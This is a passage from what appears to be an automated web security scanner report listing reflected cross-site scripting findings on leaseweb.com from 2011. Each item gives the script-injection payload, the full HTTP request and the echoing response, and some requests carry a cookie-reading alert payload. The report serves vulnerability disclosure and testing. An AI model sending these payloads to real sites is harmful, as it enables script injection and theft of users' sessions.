User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:39:03 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/images/lsw2cf012"><script>alert(1)</script>a0a86f7335c/favicon.ico">
...[SNIP]...

4.92. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /images/lsw2/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cd59"><script>alert(1)</script>60937a1f16e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/lsw2/favicon.ico8cd59"><script>alert(1)</script>60937a1f16e HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:40:31 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/images/lsw2/favicon.ico8cd59"><script>alert(1)</script>60937a1f16e">
...[SNIP]...

4.93. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /nl/maatwerk-oplossingen/private-cloud

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85608"><script>alert(1)</script>49ae32a0dad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nl85608"><script>alert(1)</script>49ae32a0dad/maatwerk-oplossingen/private-cloud HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/nl/over-ons/klanten
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; symfony=daf9a023172501d53f64bf1ec4e87cf6; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.2.10.1303149626

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:05:27 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/nl85608"><script>alert(1)</script>49ae32a0dad/maatwerk-oplossingen/private-cloud">
...[SNIP]...

4.94. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /nl/maatwerk-oplossingen/private-cloud

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19d26"><script>alert(1)</script>f0849897138 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nl/maatwerk-oplossingen19d26"><script>alert(1)</script>f0849897138/private-cloud HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/nl/over-ons/klanten
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; symfony=daf9a023172501d53f64bf1ec4e87cf6; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.2.10.1303149626

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:05:43 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/maatwerk-oplossingen19d26"><script>alert(1)</script>f0849897138/private-cloud">
...[SNIP]...

4.95. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /nl/maatwerk-oplossingen/private-cloud

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e42f6"><script>alert(1)</script>2b6bf11932d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nl/maatwerk-oplossingen/private-cloude42f6"><script>alert(1)</script>2b6bf11932d HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/nl/over-ons/klanten
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; symfony=daf9a023172501d53f64bf1ec4e87cf6; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.2.10.1303149626

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:05:59 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/maatwerk-oplossingen/private-cloude42f6"><script>alert(1)</script>2b6bf11932d">
...[SNIP]...

4.96. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /nl/over-ons/klanten

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a3e1"><script>alert(1)</script>18e3622a63c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nl7a3e1"><script>alert(1)</script>18e3622a63c/over-ons/klanten HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en940ec%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2071b7b58a0/shopping-cart
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.1.10.1303149626

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:05:13 GMT
Server: Apache
Set-Cookie: symfony=6f2b6d9835f2cf7fd2b420816381f379; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/nl7a3e1"><script>alert(1)</script>18e3622a63c/over-ons/klanten">
...[SNIP]...

4.97. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /nl/over-ons/klanten

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46ebb"><script>alert(1)</script>787952ee632 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nl/over-ons46ebb"><script>alert(1)</script>787952ee632/klanten HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en940ec%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2071b7b58a0/shopping-cart
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.1.10.1303149626

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:05:29 GMT
Server: Apache
Set-Cookie: symfony=69b485cc115be701209de00212f50ba9; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/over-ons46ebb"><script>alert(1)</script>787952ee632/klanten">
...[SNIP]...

4.98. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /nl/over-ons/klanten

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e841d"><script>alert(1)</script>319b87847a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nl/over-ons/klantene841d"><script>alert(1)</script>319b87847a7 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en940ec%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2071b7b58a0/shopping-cart
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.1.10.1303149626

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:05:45 GMT
Server: Apache
Set-Cookie: symfony=c8c6078cfaeb9cba2fdbee29f9c6f7a2; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/over-ons/klantene841d"><script>alert(1)</script>319b87847a7">
...[SNIP]...

4.99. http://www.leaseweb.com/osdd.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /osdd.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41aa3"><script>alert(1)</script>dcb5ba34b31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /osdd.xml41aa3"><script>alert(1)</script>dcb5ba34b31 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:02 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/osdd.xml41aa3"><script>alert(1)</script>dcb5ba34b31">
...[SNIP]...

4.100. http://www.leaseweb.com/xml/lsw_en_bannerhome.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /xml/lsw_en_bannerhome.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c3b9"><script>alert(1)</script>558b59adc2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xml7c3b9"><script>alert(1)</script>558b59adc2f/lsw_en_bannerhome.xml HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/flash/lsw_banner_hp.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:00 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/xml7c3b9"><script>alert(1)</script>558b59adc2f/lsw_en_bannerhome.xml">
...[SNIP]...

4.101. http://www.leaseweb.com/xml/lsw_en_bannerhome.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /xml/lsw_en_bannerhome.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e32b9"><script>alert(1)</script>82fe5f5c908 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xml/lsw_en_bannerhome.xmle32b9"><script>alert(1)</script>82fe5f5c908 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/flash/lsw_banner_hp.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:55 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/xml/lsw_en_bannerhome.xmle32b9"><script>alert(1)</script>82fe5f5c908">
...[SNIP]...

4.102. https://www.leaseweb.com/en/shopping-cart [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /en/shopping-cart

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24624"><script>alert(1)</script>111afbe26a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en24624"><script>alert(1)</script>111afbe26a9/shopping-cart HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:15:07 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en24624"><script>alert(1)</script>111afbe26a9/shopping-cart">
...[SNIP]...

4.103. https://www.leaseweb.com/en/shopping-cart [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /en/shopping-cart

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25490"><script>alert(1)</script>56a88540018 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/shopping-cart25490"><script>alert(1)</script>56a88540018 HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:15:55 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 13910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/shopping-cart25490"><script>alert(1)</script>56a88540018">
...[SNIP]...

4.104. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /en/shopping-cart/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b337c"><script>alert(1)</script>24844152312 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enb337c"><script>alert(1)</script>24844152312/shopping-cart/login HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Referer: https://www.leaseweb.com/en/shopping-cart
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:51:42 GMT
Server: Apache
Status: 404 Not Found
Set-Cookie: goBack=0; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/enb337c"><script>alert(1)</script>24844152312/shopping-cart/login">
...[SNIP]...

4.105. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /en/shopping-cart/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbddb"><script>alert(1)</script>dc5039635e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/shopping-cartfbddb"><script>alert(1)</script>dc5039635e6/login HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Referer: https://www.leaseweb.com/en/shopping-cart
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:52:24 GMT
Server: Apache
Status: 404 Not Found
Set-Cookie: goBack=0; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 13920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/shopping-cartfbddb"><script>alert(1)</script>dc5039635e6/login">
...[SNIP]...

4.106. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /en/shopping-cart/login

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fcd8"><script>alert(1)</script>8190e06220 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/shopping-cart/login8fcd8"><script>alert(1)</script>8190e06220 HTTP/1.1
Host: www.leaseweb.com
